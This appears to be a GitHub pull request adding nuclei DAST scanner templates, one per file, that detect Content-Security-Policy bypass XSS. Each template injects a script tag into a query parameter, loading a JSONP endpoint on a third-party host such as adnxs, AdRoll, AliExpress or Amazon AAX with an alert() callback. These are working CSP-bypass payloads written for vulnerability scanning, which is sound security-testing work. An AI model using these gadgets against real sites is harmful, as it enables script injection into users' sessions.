Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSP Bypass (DAST) Templates #11526

Open
wants to merge 16 commits into
base: main
Choose a base branch
from
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/adnxs-ib-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: adnxs-ib-csp-bypass

info:
name: Content-Security-Policy Bypass via Adnxs IB
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,adnxs-ib

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: adnxs_ib_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://ib.adnxs.com/async_usersync?cbfn=alert(1)-"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "adnxs_ib_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/adnxs-secure-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: adnxs-secure-csp-bypass

info:
name: Content-Security-Policy Bypass via Adnxs Secure
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,adnxs-secure

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: adnxs_secure_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://secure.adnxs.com/getuidp?callback=alert(1)"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "adnxs_secure_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/adobe-campaign-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: adobe-campaign-csp-bypass

info:
name: Content-Security-Policy Bypass via Adobe Campaign
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,adobe-campaign

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: adobe_campaign_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://lghnh-mkt-prod1.campaign.adobe.com/lgh/at_seg_list.jssp?callback=alert(1)-"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "adobe_campaign_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/adroll-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: adroll-csp-bypass

info:
name: Content-Security-Policy Bypass via AdRoll
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,adroll

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: adroll_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://d.adroll.com/user_attrs?advertisable_eid=5L5IV3X4ZNCUZFMLN5KKOD&jsonp=alert(document.domain)"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "adroll_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/afterpay-help-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: afterpay-help-csp-bypass

info:
name: Content-Security-Policy Bypass via Afterpay Help
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,afterpay-help

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: afterpay_help_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://help.afterpay.com/sc/faye/?message=[{%22channel%22:%22%22}]&jsonp=alert"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "afterpay_help_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/akamai-content-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: akamai-content-csp-bypass

info:
name: Content-Security-Policy Bypass via Akamai Content
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,akamai-content

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: akamai_content_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://content.akamai.com/index.php/form/getForm?munchkinId=113-DTN-266&form=1402&callback=alert"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "akamai_content_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/alibaba-ug-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: alibaba-ug-csp-bypass

info:
name: Content-Security-Policy Bypass via Alibaba UG
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,alibaba-ug

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: alibaba_ug_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://ug.alibaba.com/api/ship/read?callback=alert"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "alibaba_ug_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/aliexpress-acs-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: aliexpress-acs-csp-bypass

info:
name: Content-Security-Policy Bypass via AliExpress ACS
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,aliexpress-acs

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: aliexpress_acs_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://acs.aliexpress.com/h5/mtop.aliexpress.address.shipto.division.get/1.0/?type=jsonp&dataType=jsonp&callback=alert"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "aliexpress_acs_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/amap-wb-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: amap-wb-csp-bypass

info:
name: Content-Security-Policy Bypass via AMap WB
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,amap-wb

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: amap_wb_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://wb.amap.com/channel.php?callback=alert"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "amap_wb_csp_xss == true"
38 changes: 38 additions & 0 deletions dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: amazon-aax-eu-csp-bypass

info:
name: Content-Security-Policy Bypass via Amazon AAX EU
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,amazon-aax-eu

headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"

- action: waitdialog
name: amazon_aax_eu_csp_xss
args:
max-duration: 5s

payloads:
injection:
- '<script src="https://aax-eu.amazon.com/e/xsp/getAdj?callback=alert(1)-"></script>'

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"

matchers:
- type: dsl
dsl:
- "amazon_aax_eu_csp_xss == true"
Loading